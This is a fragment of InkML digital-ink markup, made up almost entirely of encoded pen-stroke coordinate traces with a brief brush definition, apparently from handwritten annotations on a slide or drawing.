0,0 18-1,-1-18 17,1 17-32,-1-17 15,1 0 1,0 0-1,-1 18-15,1 0 47,0-18 0,-1 0 31,36 53-78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3:44.531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2240 11712 0,'0'18'16,"0"0"-1,-18 17-15,-17 35 16,35-52-16,-35 17 15,35 1-15,-35 16 16,17-16-16,-35-1 16,35 18-16,-17-35 15,18-1-15,-19 18 16,1 1-16,17-1 16,-17-17-16,17-1 15,1 19-15,-18 16 31,17 1-31,18-35 0,-18 0 16,-17 35-16,35-36 16,-18-17-1,18-17 110,0-1-109,0 0-16,0 1 16,0-19-16,0 1 15,0 0-15,0-18 16,0 35-16,0-35 15,0 18-15,0 0 16,0 0-16,0-1 16,0 19-16,0-1 15,0 0-15,0 1 32,0-1-32,-17 0 78,34 36 94,1-18-157,-18 18-15,18-1 16,-18 1-16,17 0 15,1-1-15,0 19 16,-1-1-16,18 0 16,-17 0-16,0 1 15,17 17-15,-17-1 16,35 1-16,-36-17 16,18 17-16,1-18 15,-1 18-15,36 35 31,-54-53-31,1-17 0,-1 0 32,-17-1-17,18-17 32,0 0 0,-1-17-16,-17-19-15,0 19 0,18-19-16,-18 1 15,0 0-15,0 0 16,0-1-16,0 1 15,0-18-15,0 0 16,0 0-16,0 0 16,0-17-16,0 17 15,0-35-15,0 17 16,0 18-16,0-17 16,0 34-16,0 19 15,0-19-15,0 19 16,0-1 15,0 36 78,0-1-109,0 1 16,0 0-16,-18 35 16,1-18-16,17-17 15,0-1-15,-36 18 16,19 1-16,-1-1 16,1 0-16,-19 36 15,1-36-15,-18 53 16,-17-17-16,17-1 15,17-17-15,-34 0 16,52 0-16,-17-35 16,0 17-16,17-17 31,0-18-31,18 17 31,-17-17 0,-1 18-15,-17-18 0,17 18-1,1-18 1,-1 0-16,0 0 16,1 0-1,-1 0-15,0 0 16,-17 0-16,0 0 15,-36-53-15,36 35 16,17-17-16,-17 17 16,17 1-16,1-19 15,-19 1-15,36 0 16,-35-18-16,35 0 16,-17 0-16,17-18 15,0 18-15,0 1 16,0 16-16,0 1 15,0 17 1,17 1-16,1 17 31,17 0-31,0 0 0,1 0 16,17 0 0,17 17-16,-17 1 15,35 0-15,0 17 16,-17 0-16,17 0 15,-17 1-15,17-1 16,-18-17-16,-17 17 16,18 0-16,-1-17 15,-34-1-15,34 19 16,-52-36-16,0 0 16,-1 0-1,1 0 1,17 0-1,-17 0 1,17-18 15,-4092 0-31,8149 1 16,-4074 17 0,-18-18-16,18 18 15,-18-35 1,0 17-1,17 1 1,-17-1 0,0 0-16,-17 18 125,-36 18-110,0 0 1,0-1-16,-35-17 16,52 18-16,-17-18 15,36 18-15,-1-18 16,1 0-16,-1 17 15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6:50.9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431 4039 0,'18'0'47,"0"0"-47,34 0 16,-16 0-16,17 0 15,17 0-15,36 0 16,70 0-16,1 0 16,17 18-16,0 0 15,-35-18-15,-18 0 16,-71 0-16,-34 0 15,-19 0-15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6:52.8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93 5644 0,'35'0'78,"53"0"-78,36 0 16,-18 0-16,-18 0 15,35 0-15,-17 0 16,18 0-16,-1 0 15,-35 0-15,18 0 16,-18 0-16,-17 0 16,35 0-16,-18 0 15,-17 0-15,-19 0 16,1 0-16,-17 0 16,-19 0-16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6:55.6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80 7161 0,'17'0'0,"1"0"16,0 0-1,-1 0 1,1 0-16,35 0 16,0 0-16,17 0 15,71 0-15,-17 0 16,35 0-1,35 0-15,-36 0 0,36 0 16,-35 0-16,35 0 16,-53 0-16,-53 0 15,1 0 1,-1 0-16,-53-17 16,18 17-16,-18-18 15,18 18-15,0-18 16,53-17-16,-18 35 15,36 0-15,17 0 16,0 0-16,18 0 16,-36 0-16,18 0 15,-17 0-15,-1 0 16,-35 0-16,-17 0 16,-1 0-16,-17 0 15,18 0-15,35 18 16,0-1-16,-36-17 15,-17 18-15,18 0 16,-19-18-16,19 17 16,-36-17-16,36 0 15,-18 0 1,0 0-16,-18 0 0,0 0 16,1 0-16,16 0 15,1 0-15,18 0 16,35 18-16,-36-18 15,36 18 1,-35-18-16,-1 17 16,1-17-16,-18 18 0,-36-18 15,19 0 1,-19 0 0,1 0 109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7:25.093"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.08819" units="cm"/>
      <inkml:brushProperty name="height" value="0.35278" units="cm"/>
      <inkml:brushProperty name="color" value="#B4CDE2"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">15349 14079,'0'18,"0"18,0 1,0-1,0 18,0-17,0 17,0 0,0-17,0 17,0 37,0 36,0-36,0 72,0-18,0 73,0 36,-18-73,18 37,0-19,-18-53,0-1,18-18,-19 0,1-55,0 19,0-37,-18 1,-1-19,-17 37,36-55,-18 36,17-36,-17 1,18-19,0 0,0 0,0 0,-19 0,19 0,0 0,-18 0,-1 0,19 0,-18 0,0 0,-1 0,1 0,-36 0,17 0,-17 0,-1 0,0 0,19 0,0 0,17 0,19 0,-36 0,-1 0,1 0,-19-19,-17 19,17-36,-72 0,36 0,18-1,-18-17,19 54,35-36,1 36,18 0,17 0,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6:49.4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599 5806,'18'0,"0"0,0 0,18 0,19 0,-1 0,37 0,18 0,18 0,18 0,18 0,1 0,-19 0,-36 0,-19 0,-17 0,-37 0,0 0,-17 0,-1 0,0 0,0 0,36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6:59.5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638 7126 0,'17'0'15,"36"0"-15,0 18 16,18 17-16,34-17 16,-16-18-16,69 53 15,1-36-15,53 1 16,52 17-16,89-17 16,-71-18-16,18 0 15,-71 0-15,-34 0 16,-37-18-16,-70-17 15,-52 35-15,-19-18 16,-17 1 0,0-1-1,0 0 126,-17 18-125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7:01.0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81 8484 0,'0'0'0,"18"0"15,35 0 1,35 0 0,53 0-16,18 0 0,17 0 15,36 0-15,-71 18 16,18 0-16,17 17 15,-35-35-15,18 35 16,-53-35-16,35 0 16,0 0-16,-18 0 15,-17 0-15,0-18 16,-53 1-16,-18 17 16,-17 0-16,-18-18 15,35 1 16,-17 17-15,17 0-16,36-18 16,35 0-1,17 1-15,-35-1 16,18 18-16,-18-18 16,0 1-16,-35 17 15,-17 0-15,-1 0 16,18-18-16,-36 18 15,36 0-15,-17 0 16,-19 0 15,-17-18 1,18 18 14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7:01.9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620 8361 0,'53'0'63,"17"0"-63,1 0 15,17 0 1,18 0-16,-18 0 15,-17 0-15,17 0 16,53 0-16,-35 0 16,17 0-16,-34 0 15,-1 0-15,-18 0 16,-17 0-16,18 0 16,-18 0-16,-18 0 15,18 0-15,-18 0 16,18 0-16,0 0 15,18 0-15,-1 0 16,1 0-16,-1 0 16,-17 0-16,0 0 15,-18 0-15,1 0 16,-19 0 62,1 0-62,0 0-1,17 0-15,18 0 16,-18 0-16,-17 0 62,17 0-46,-17 0 0,17 0-16,0 0 15,0 0-15,-17 0 47,0 0-31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7:03.2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647 8484 0,'35'0'78,"54"0"-78,-19 0 15,71 0-15,53 0 16,-17 0 0,34 0-16,1 0 15,17 0-15,-17 0 16,0 0-16,-36 0 15,-17 0-15,-18 0 16,-18-17-16,-34-1 16,-1-17-16,0-1 15,-35 19-15,-18-1 16,-17 1-16,35 17 16,-36-18-16,1 0 15,17 18-15,-17 0 16,0 0-16,17 0 15,0 0-15,-17 0 16,-1 0-16,1 0 16,0 0-16,-1 0 15,1 0 1,17 0-16,-17 18 16,35-18-1,35 35-15,35 18 0,1-35 16,17 35-16,0-18 15,-88-17 1,-35-18-16,-54 0 31,-17 0-15,-35-18-16,35 18 16,18 0-16,0 0 15,17 0-15,0 0 16,18-18-1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7:10.6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173 12594 0,'18'0'47,"0"0"-16,-1 18-15,19-18-16,-1 0 15,18 0-15,17 0 16,1 0-16,35 0 15,-36 0-15,54 0 16,-54 0-16,1 0 16,-18 0-16,0 0 15,-18-18-15,-17 18 16,-1 0 0,1 0-16,0-17 62,-1 17-46,1 0-1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18:48.4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00 15160 0,'19'0'16,"1"0"0,0 0-1,20 0-15,19 0 16,41 0-16,-21 0 15,99 0-15,41 0 16,-1 0-16,20 0 16,-139 0-1,120 0-15,19 20 16,0-20-16,0 0 16,20 20-16,0 59 15,20-59-15,-20-20 16,-40 20-16,-59-20 15,-80 0-15,-19 0 16,-21 0-16,1 0 16,-20 0-16,0 0 15,0 0-15,-1 0 16,1 0-16,0 0 16,0 0-16,40 0 15,-1 0-15,-19 0 16,-1 20-16,-19-20 15,0 20-15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19:17.1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50 12541 0,'20'0'78,"0"0"-63,20 0-15,19-20 16,1 20-16,59-40 16,40 1-16,-1 19 15,80 20-15,20 0 16,80 0-16,39 0 16,59 0-16,-19 0 15,-20 0 1,-20 0-16,-238 0 15,297 0 1,-277 0-16,-99 0 16,-21 0-16,1 0 15,-60-20 251,0 0-25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19:18.1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387 12204 0,'20'20'94,"39"-20"-78,-19 0-16,138 0 15,41 0-15,19 0 16,-40 0 0,21 0-16,-61 0 15,-59 0-15,21 0 16,-61 0-16,1 0 15,-21 0-15,1 0 16,39 19-16,-59-19 16,99 40-16,20-20 15,-20-20-15,0 0 16,-39 0-16,-60 0 16,19 0-16,-19 0 15,0 0 1,0 0-1,0 0-15,-1 0 16,41 0-16,-20 0 16,-21 0-16,1 0 15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19:22.8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3 15518 0,'-39'19'32,"-21"61"-17,-39-21-15,-20 41 16,0-21-16,-20 20 16,-40-19-16,100 19 15,79-20-15,0-19 16,0-41-16,0 61 15,0-40-15,0-1 16,0-19-16,0 0 16,20 0-1,0 0-15,39-1 16,1 21-16,59 20 16,20-1-16,59-19 15,-19 19-15,59 41 16,-20-41-16,-19 1 15,-80-21-15,-20-19 16,-40 0 0,-59-60 31,0-19-47,0-21 15,0-39-15,0 20 16,0-60-16,-19 40 15,-41-39-15,1 19 16,-21-40-16,1-19 16,-40 39-16,19-20 15,1 40-15,60 80 16,-1-60-16,0-20 16,0 20-16,21 79 15,-21-39-15,20 19 16,0 21-16,20 19 15,-20-20-15,1 40 16,-1 0 15,0 20-31,-40 39 16,-19 80-16,-40 60 16,40 19-16,-21 0 15,1 40-15,40-20 16,19 20-16,20 20 15,20 0-15,0-40 16,0-20 0,40-39-16,19 0 15,-19-1-15,20-39 16,-41-79-16,21 19 16,-40-39-16,20-40 15,0 0 32,-20-40 0,0-39-31,20-60-16,-1 40 15,21-40-15,20-60 16,-21 1-16,1-60 15,59-20-15,-19 40 16,-1 0-16,0 19 16,-19 21-16,19 0 15,-79 158-15,0-79 16,0 59-16,0-19 16,0 39-16,0 1 15,0 19 1,0 0-16,0 0 15,0 0 1,20 20 0,-20-20-16,0 0 15,0 1 95,0-21-95,0-20 1,20 21-16,0-21 16,0 40-16,-20-19 15,0-1-15,19 40 16,-19-40-16,0 20 15,20 1-15,-20-21 16,0 20 0,20 20-1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2:53.0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27 12559 0,'0'-18'31,"53"18"-15,17-17 0,89 17-16,18-36 15,-19 19-15,-34 17 16,17 0-16,-18 0 15,-52 0-15,-36 0 16,0 0-16,-17 0 16,0 0-1,-1 0-15,36 0 16,0 0-16,-17 17 16,-19-17-16,1 0 15,35 0-15,-18 18 31,-35 0-15,18-18-16,-1 0 31,1 0 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6:51.6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80 7203,'0'0,"36"0,-17 0,17-18,0 18,0 0,-17 0,-1 0,18 0,0 0,37 0,-1 0,37 0,18 0,37 0,35 0,1 0,-19 0,37 0,18 0,36 0,0 0,-36 0,18 18,18-18,-18 0,0 0,-91 0,37 0,-37 0,-36 0,-18 0,-55 0,1 18,-19-18,-18 0,0 0,1 0,-1 0,18 0,-18 0,0 0,19 0,-1 0,18 0,1 0,35 0,1 0,54 0,0 0,1 0,-1 0,0 0,-18 0,-55 0,1 0,-19 0,-17 0,-19 0,18 0,-18 0,0 18,1-18,35 0,-18 0,19 0,17 0,37 0,-18 0,36 0,0 0,18 0,-36 0,54 0,-54 0,18 0,0 0,18 0,0 18,19 0,35-18,1 37,-19-37,19 0,-1 18,37-18,-36 0,36 0,-1 0,38 0,-19 0,-19 18,19-18,-72 18,-1-18,1 0,-1 0,1 0,35 0,1 0,72 0,-36 0,0 0,-18 0,73 0,-74 0,1 0,-18 0,-18 0,-55 0,36 0,-18-36,19 36,-55-18,18-19,-18 19,0 18,-91 0,1-18,-1 18,-18 0,0-18,0 18,0 0,1 0,-1 0,0 0,18 0,-18 0,19 0,-1 0,0 0,19 0,-1 0,-72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2:55.2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11 12506 0,'18'-18'125,"17"18"-109,53 0 0,36-17-16,70-1 15,0 18-15,-18 0 16,-17 0-16,35 0 15,0 0-15,-53 0 16,-35 0-16,52 0 16,-69 0-16,-1 0 15,-18 0-15,-17 0 16,18 0-16,-18 0 16,0 0-16,-36 0 15,1 0-15,0 0 16,-1 0 46,1 0-30,0 0 46,-1 0-63,19 0 17,-19 0-1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2:58.1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218 13935 0,'18'0'109,"17"-18"-93,-17 18 15,0 0-31,17 0 16,18 0 0,53-18-16,17 18 15,71-35-15,18 35 16,70 0-16,-53 0 15,18 0-15,0 0 16,-35 0-16,-36 0 16,-35 0-16,0 0 15,-70 0-15,17 0 16,-35 0-16,-18 0 16,1 0-16,-19 0 15,19 0-15,-1-17 16,35 17-16,72 0 15,16 0-15,-17 0 16,18 0-16,53 0 16,52 0-16,-87 0 15,-54 0-15,1 0 16,-107 0-16,19 0 16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3:15.9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68 17868 0,'-17'0'46,"34"0"204,89 0-234,53 0 0,35 0-16,18 0 15,52 0-15,-34 0 16,-1 0-16,0 0 16,-17 0-16,-71 0 15,-35 0-15,-18 0 16,-53 0-16,-17 0 15,-1 0 1,36 0 31,-17 0-47,52 0 16,35 0-16,-17 0 15,18 0-15,-36 0 16,35 0-16,1 0 15,17 0-15,-53 0 16,-17 0-16,-36 0 16,35 0-16,-17 0 15,-17 0 1,34 35-16,36-35 0,-18 18 16,-17-18-1,35 18-15,-36-18 16,1 0-16,-54 0 15,1 0-15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02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47 3969 0,'35'53'47,"212"123"-47,-18-35 15,-52-35-15,-19-18 16,-52-17-16,-18-1 16,-52-52-16,-1 0 15,-17-1 1,17-123 46,88-70-46,-52 35-16,17 0 16,18-53-16,-53 123 15,17-52-15,-52 70 16,-18 0-16,18 35 15,-18 1-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="737.5969">1217 6209 0,'18'0'47,"17"53"-47,-17-18 16,35 36-1,35 34-15,0-34 16,0 17-16,-35 0 16,71 1-16,-1 52 15,-70 0-15,17-18 16,1-17-16,0 0 15,-54-71-15,36 1 16,53-89 62,-71-18-62,1 36-16,16-53 15,-34 70-15,0-53 16,-1 36-16,-17 17 16,18-17-16,-18 0 15,0 17 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="2073.369">1270 11800 0,'18'-17'79,"17"17"-64,-17 0-15,52 17 16,1 89-1,-36 0-15,18-18 16,-18 18-16,-17-35 16,17-18-16,-17-36 15,-1 18-15,1-35 16,17 0 31,-17 0 0,-18 18-47,35-18 15,0-35 32,54-71-31,-19-53-16,1 36 15,-18 35-15,17-53 16,1 52-16,-71 36 16,17 18-16,-17 0 15,0 17 1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6:41.4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222 5944 0,'18'18'16,"0"-18"-1,35 0-15,-1 0 16,37 0-16,34 0 15,36 0-15,35 0 16,0 0-16,18 0 16,17 0-16,-17 0 15,-36 0-15,177 0 32,-177 0-32,-17 0 0,-36-18 15,18-17-15,-17 35 16,17-35-16,-17 35 15,52-36 1,-17 19-16,-1 17 16,36 0-16,18 0 15,-35 0-15,17 0 16,-36 0-16,19 0 16,-36 0-16,0 0 15,-18 0-15,-17 0 16,18 0-16,-54 0 15,124 0 1,-123 0-16,35 0 16,-36 0-16,36 0 15,0 0-15,17 0 16,18 0-16,1 0 16,-37 0-16,37 0 15,-19 0-15,36 0 16,-36 0-16,18 0 15,-17 0-15,-1 0 16,-52 0-16,-1 0 16,-17 0-16,-35 0 15,0 0-15,-1 0 16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6:42.6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7373 0,'35'-18'16,"124"1"-1,-1-1-15,89-35 16,18 18 0,35 17-16,53-35 15,70-17-15,-211 52 16,-18-35-16,-71 53 15,-35-17-15,-17 17 16,-36 0-16,18 0 0,-35 0 31,-18-18 1,-18 0-1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6:43.4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9084 0,'35'0'47,"71"0"-32,88 0-15,0 0 16,18 0-16,-36 0 16,1 0-16,-54 18 15,18 35-15,-35 0 16,-71-53-16,-17 17 15,-71-17 32,-35-53-47,17 0 16,36 36-16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6:45.7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68 8961 0,'35'0'78,"1"0"-62,17 0 0,-18 0-16,18 0 15,0 0-15,0 0 16,0 0-16,17 0 15,36 0-15,0 0 16,0 0-16,17 0 16,-17 0-16,35 0 15,35 0-15,-17 0 16,35 0-16,-17 0 16,17 0-16,17 0 15,-34 0-15,34 0 16,1 0-16,17 0 15,36 0-15,-36 0 16,1 0-16,17 0 16,-36 0-16,-34 0 15,17 0-15,-36 0 16,1 0-16,0 0 16,0 0-16,-18 0 15,35 0-15,-35 0 16,18 0-16,-18 0 15,18 0-15,-18 0 16,0 0-16,0 0 16,18 0-1,-18 0-15,0 0 16,-35 0-16,-36 0 16,-17 0-16,-17 0 15,-1 0-15,0 0 16,1 0-16,16 0 15,-34 0-15,88 0 16,-36 0 0,19 0-16,34 0 15,18 0-15,0 0 16,53 0-16,18 0 16,35 0-16,-18 0 15,54 0-15,34 17 16,53 36-16,89 35 15,-106-70-15,158 53 32,-4462-71-32,8043 0 0,-4074 0 15,17 0 17,-17 0-17,-36 17 110,-17-17-125,-18 0 16,-17 0-16,-1 0 15,1 0-15,-54 0 16,18-17-16,18-1 16,35 18-16,18 0 15,0 0-15,17 0 16,18-35 171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7:36.5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10724 0,'-18'-17'15,"18"-1"95,18 18-95,34 0 1,1 0-16,36 0 16,-1 0-16,35 0 15,1 0-15,-36 0 16,-35 0-16,17 0 16,-17 0-16,0 0 15,0 0-15,0 0 16,18 0-16,34 0 15,-16 0-15,-19 0 16,1 0-16,35 0 16,-36 0-16,1 0 15,-18 0-15,17 0 16,-17 0-16,0 0 16,-18 0-16,18 0 15,0 0 1,0 0-16,18 0 0,-1 0 15,36 0 1,-18 0-16,36 0 0,-36 0 16,35 0-1,-52 0-15,-1 0 16,-17 18-16,36-1 31,-72-17-31,18 0 16,-17 0-16,0 0 15,17 0-15,0 0 16,36 0-16,-1 0 16,36 0-16,71 0 15,34 0-15,36 0 16,106 0-16,123 0 31,-335 0-31,-17 0 0,-71 0 16,-18 0-16,-17 0 15,-1 0 1,1 0-16,17 0 31,-17 18 47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7:38.4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95 10777 0,'18'-17'16,"17"17"0,1 0-1,17 0-15,52 0 16,-16 0-16,34 0 16,-17 0-1,88 0-15,0-18 0,0-17 16,-35 17-16,17-17 15,-17 17 1,-18 18-16,0 0 0,53 0 16,-35 0-16,0 0 15,52 0 1,36 0-16,-17 0 16,-1 0-16,-18 0 15,19 0-15,-19 0 16,19 0-16,-19 0 15,1 0-15,53 0 16,-36 0-16,-17 0 16,-1 0-16,-34 0 15,-36 0-15,35 0 16,-35 0-16,0 0 16,18 0-16,-35 18 15,-36 0-15,-53-1 16,0 1-16,-17-18 15,0 0-15,-1 0 32,1 0-17,0 0 1,17 0 0,-17 0-1,-1 0 1,1 0-1,-1 0 1,1 0 15,0 0 1,-1 0-32,19 0 31,-19 0 0,1 17-31,0-17 16,-1 18-1,1-18 1,-1 0 0,1 0-1,0 0 1,-4075 0-16,8149 0 0,-4074 0 15,-1 0 17,1 0-32,0 0 47,-1 0 78,-17-18-79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16.4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384 8817,'18'0,"1"0,-1 0,0 0,36 0,19 0,-19 0,19 0,54 37,0-19,-18-18,72 0,-18 0,1 0,35 0,19 0,-55 0,37 0,-37 0,0 0,19 0,-37 0,18 0,-18 0,1 0,-38 0,1 0,-36 0,18 0,-37 0,0 0,1 0,-19 0,0 0,-17 0,35 0,-36 18,18-18,1 0,-19 0,18 0,0 0,19 0,-1 0,-17 0,53 18,-35-18,35 0,19 18,0-18,-36 0,36 0,-37 18,37-18,-73 0,1 0,-19 0,0 0,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7:40.3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604 10636 0,'17'0'47,"36"0"-47,18 0 16,-18 0-1,0 0-15,-18 0 16,18 0-16,0-17 16,17 17-16,-17 0 15,0-18-15,-18 18 16,1 0-16,-19 0 15,1 0 17,0 0-17,-1 0 1,1 0 0,-1 0 15,1 0 16,0 0-32,17 0 1,-17 0 0,17-18-16,0 18 15,106-53 16,-70 36-31,-54 17 16,1-18-16,17 1 16,-17 17-1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51:14.6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5953 0,'0'20'32,"40"19"-1,19-39-31,21 0 15,59 0-15,-100 0 16,120 0-16,0 0 16,39 0-16,40 0 15,-39 0-15,-21 0 16,-39 0-16,-20 0 16,20 20-16,-20-20 15,-39 0-15,-21 0 16,-19 0-16,-1 0 15,-19 0-15,0 0 16,0 0 0,0 0-16,0 0 31,0 0-15,-1 0-1,1 0 1,0 0 31,0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51:17.3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60 6072 0,'20'0'0,"20"0"15,19 0-15,20 0 16,60 0-16,20 0 16,-99 0-16,79 0 15,-1 0-15,21 0 16,0 0-16,-20 0 15,39 0-15,-19 0 16,59 0-16,-39 0 16,-20 0-16,0 0 15,-40 0-15,0 0 16,-40 0-16,-19 0 16,-21 0-16,-19 0 15,0 0-15,0 0 31,20 0-15,-21 0-16,1 0 16,0 0-16,20 0 15,-20 0-15,-1 0 16,1 0 62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07.8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1 5803 0,'0'18'78,"18"-18"-62,70 70-16,0 1 15,-17-1-15,-54-52 16,1 0-1,0-18 1,-1 17 31,1-17-16,17-123 0,18 17-31,-17 18 16,34-106-16,-17 35 16,0 36-16,-18 52 15,-17 1-15,-18 52 32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="791.6694">1111 7814 0,'0'71'47,"0"-18"-47,0 17 15,0 1-15,0-1 16,0-17-16,18 35 16,35 18-16,-18-35 15,18 17-15,0 0 16,-18-70-16,0 88 15,18 17 1,-53-35-16,71 71 16,-53-36-16,70 107 15,-71-124-15,36-71 16,-17-18 0,-19-17-1,71-229 16,36-124-31,-71 124 16,0 35-16,53 0 16,-71 0-16,35 71 15,-52 70-15,-18 35 16,0 0-16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7:54.6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52 4286 0,'35'18'47,"18"0"-47,18-18 15,34 17 1,37 1-16,-1-1 16,53-17-16,0 0 15,-36 0-15,1 0 16,-35 0-16,-36 0 16,-35 0-16,0 0 15,-53-17-15,35 17 16,-17-18-16,-1 18 15,36 0-15,35-17 16,-17 17-16,17 0 16,-35 0-16,53 0 15,-71 0 1,18 0-16,-18 0 16,36 0-16,17 0 15,18-18-15,17-17 16,18 17-16,1 0 15,-1 1-15,0-1 16,-35 0 0,-18 18-16,0 0 0,-17 0 15,-36 0-15,18 0 16,-18 0-16,18 0 16,-18 0-16,142 36 31,-54-19-31,71 1 15,71 17-15,35 18 16,-18-18-16,-88-17 16,18 0-1,-195-18-15,1 0 47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35.7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94 4357 0,'0'-18'16,"0"1"15,0-1-15,36 18 0,-19 0-1,19-18-15,-19 18 16,19 0-16,-1 0 15,35 0-15,36 0 16,-35 0-16,52 18 16,18-18-16,-17 0 15,17 0-15,-35 0 16,35 0-16,0 0 16,35 0-16,-17 0 15,-18 0-15,18 0 16,-18 0-16,-17 0 15,299 0 32,-370 18-47,0-1 16,53-17-16,-54 0 16,54 0-16,18 0 15,-4111 0-15,8168 0 16,-4111 0-16,-17 0 15,0 0-15,0 0 16,0-17-16,53-1 31,-71 18-31,0 0 16,1 0-16,-1 0 16,0 0-1,36 0-15,-1 0 0,1 0 16,35 0-16,-18 0 15,18 0-15,-18 0 16,18 0 0,-18 0-16,-17 0 15,34 0-15,-34 0 0,-18 0 16,0 0 0,-18 0-16,0 0 15,1 0-15,-19 0 16,36 0-16,-35 0 15,-1 0-15,1 0 16,0 0 0,17 0 31,-17 0-47,-1 0 15,19 0-15,-1 0 16,0 0-16,0 0 15,1 0-15,-1 0 16,0 0-16,1 0 16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41.2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14 4304 0,'18'0'32,"17"0"-32,18 0 15,18 0 1,35 0-16,35 0 15,0 0-15,53 18 16,17-1-16,19 18 16,34-35-16,-34 0 15,-1 0-15,-35 0 16,-53 0-16,-53 0 16,-35 0-16,-18 0 15,-17 18 1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44.0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45 5821 0,'36'0'31,"-1"0"-31,0 0 15,18 0-15,0 0 16,18 0-16,34 0 16,-34 0-16,193 0 31,-122 0-31,16 0 0,-17 0 16,1 0-1,-1 0-15,-35 0 0,-36 0 16,1 0-16,-1 0 15,-17 0 1,0 0-16,-18 0 16,1 0-16,-1 0 0,53 0 31,-4092 0-31,8167 0 16,-4110 0-16,35 0 15,0 0-15,18 0 16,-18 0-16,36 0 15,-19 0-15,37 0 16,-19 0-16,36 0 16,17 0-16,1 0 15,-1 0-15,36 0 16,-1 0-16,19 0 16,-1 0-16,53 0 15,-17 0-15,-1 35 16,54 18-16,-1-18 15,-17 1-15,-71-19 16,36-17-16,-71 0 16,18 0-16,17 0 15,0 0-15,-35 0 16,18 0-16,-36 18 16,18-1-16,-35 1 15,0 0-15,-36-1 16,-17 1-1,53 0-15,-18-1 16,0-17-16,18 0 16,0 0-16,52 0 15,-17 0-15,-52 0 16,-1 0-16,0 0 16,-18 0-16,-35 0 15,18 0-15,-53 0 16,18 0-16,-1 0 15,-34 0-15,34 0 16,-17 0-16,18 0 16,-1 0-16,-35 0 15,1 0-15,17 0 16,-18-17-16,53-19 31,-53 19-31,54-36 0,-37 0 16,37 18-16,-36-18 15,-18 35 1,0 0-16,18-17 16,-18 35-16,1-17 0,16-1 15,-16 0-15,-19 18 16,19-17 0,17 17-1,-36 0-15,1 0 16,35 0-16,-36 0 15,19 0 1,-19 0 0,1 0 15,0 0-15,-1 0 93,1 0-93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45.5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849 5944 0,'0'0'0,"35"0"15,18 0-15,18 0 16,-1 0-1,19 0-15,16 0 0,72 0 16,-18 0-16,35 0 16,-18 0-1,36 0-15,-1 0 16,1 0-16,-18 0 0,-35 0 16,0 0-1,-54 0-15,-34 0 16,-36 0-16,-17 0 15,0 0 1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47.2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19 7161 0,'-18'0'47,"-17"0"-16,0 0-31,-54-17 0,1 17 16,-35 0-16,-36 0 15,0 0 1,-52 0-16,-19 0 16,-17 0-16,-70 0 15,-71 0-15,-88 0 16,-71-53-16,71 53 15,-54 0-15,142 0 16,88-35-16,71 35 16,0-18-16,70-17 15,-35 17-15,53 0 16,0 1-16,0-1 16,0 0-16,0 18 15,17 0-15,-17 0 16,35 0-16,0 0 15,0 0-15,36 0 16,-18 0-16,35 0 16,-18 0-16,-17 0 15,17 0-15,1 0 16,-18 0-16,0 18 16,17 0-16,0-1 15,-17-17-15,53 0 16,-18 18-1,18-18-15,-18 18 0,-18-18 16,18 0-16,-17 0 16,-1 0-1,18 0-15,18 0 16,17 0-16,1 0 1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17.3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78 8745,'36'0,"-17"0,-1 0,0 0,18 0,0 0,55 0,18 0,18 0,-18 0,18 0,36 0,55 0,54 0,91 0,-127 36,36-36,18 18,-72-18,-19 37,19-19,0 0,0-18,-73 18,-18 0,-18 0,-73-18,18 0,-36 18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39:57.3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16 8378 0,'18'0'31,"0"0"-15,52 0-16,1 0 15,70 0-15,-18 0 16,36 0-16,17 0 16,1 0-16,17 0 15,-35 0-15,-18 0 16,0 0-16,-35 0 15,-18 0 1,-53 0-16,0 0 16,1 0-16,-1 18 15,-17-18-15,17 0 16,0 18-16,0-18 16,18 0-16,0 0 15,18 0-15,-18 0 16,17 0-16,-17 0 15,35 0-15,-17 0 16,52 0-16,-34 0 16,34 0-16,-35 0 15,36 0-15,-18 0 16,-18 0-16,-3969 0 16,8026 0-1,-4074 0-15,-36 17 16,0-17-16,-17 0 31,-18 18 0,18 0-15,-18-1 0,17-17-1,1 0-15,17 18 16,1-18-16,16 0 15,1 0-15,18 0 16,17 0-16,-17 0 16,52 18-16,18-1 15,18 18-15,35-17 16,0 17-16,-70-17 16,-54 0-16,-52-1 15,-18 1 1,0 0-1,0 17-15,0-17 16,0-1 0,0 1-16,0-1 15,0 1 1,-18-18 15,0 0 47,18-18-46,-17 18 77,17-17-78,-18 17-15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0:03.3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69 10160 0,'0'-35'47,"18"35"-31,70 0-16,0-18 15,89 0-15,35 1 16,34-18-16,19 35 15,-18 0-15,-35 0 16,-89 0-16,-35 0 16,-35 0-16,-17 0 15,16 0-15,-16-18 16,-1 0 0,0 1-1,-17 17 1,0 0-1,17 0 17,-18 0-32,19 0 15,-1 0-15,0 0 16,1 0-16,17 0 16,35 17-16,-35-17 15,0 18-15,-1-18 16,-34 0-16,0 0 31,-1 0 32,1 0-63,0 18 15,-1-18 32,1 0-47,17 0 16,0 0-16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0:04.8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57 9825 0,'0'17'63,"18"-17"-32,-1 0-15,19 0-16,-1 0 15,18 0-15,247 0 47,-177 0-47,18 0 0,36 0 16,-19 0-1,-16 0-15,-90 0 16,-34 0-16,17 0 31,-35-17-15,18 17 15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0:05.6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50 10089 0,'0'0'0,"35"0"0,35 0 16,-17 0-16,18 0 15,17 0-15,0 0 16,18 0-16,0 0 16,0 18-16,17 0 15,18-1-15,36-17 16,-19 0-16,178 0 31,-160 0-31,-35 0 0,0 0 16,0 0-1,-35 0-15,-53 18 16,-18-18-16,-17 0 16,0 0-16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7:38.6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54 4392 0,'53'0'62,"0"0"-62,35 0 16,36 0-16,17 0 15,18 0-15,-1 0 16,19 0-16,-19 0 16,1 0-16,18 0 15,-1 0-15,36 0 16,35 0-16,-53 0 15,53 0-15,-18 0 16,0 18-16,18-1 16,-35 36-16,-1-53 15,-34 0 1,-36 0-16,-35 0 0,-53 0 16,-18 0-16,-17-17 15,17-1 1,-17 18-16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54:45.3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651 11410 0,'0'20'109,"0"0"-93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6:54:57.0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38 11331 0,'40'19'78,"79"-19"-78,0 0 16,40 0-16,39 0 15,-19 0-15,0 0 16,-100 0-16,80 0 15,39 0-15,-39 20 16,-20 20-16,20-20 16,-21-20-16,-38 0 15,19 0-15,-40 0 16,1 0-16,-1 0 16,0 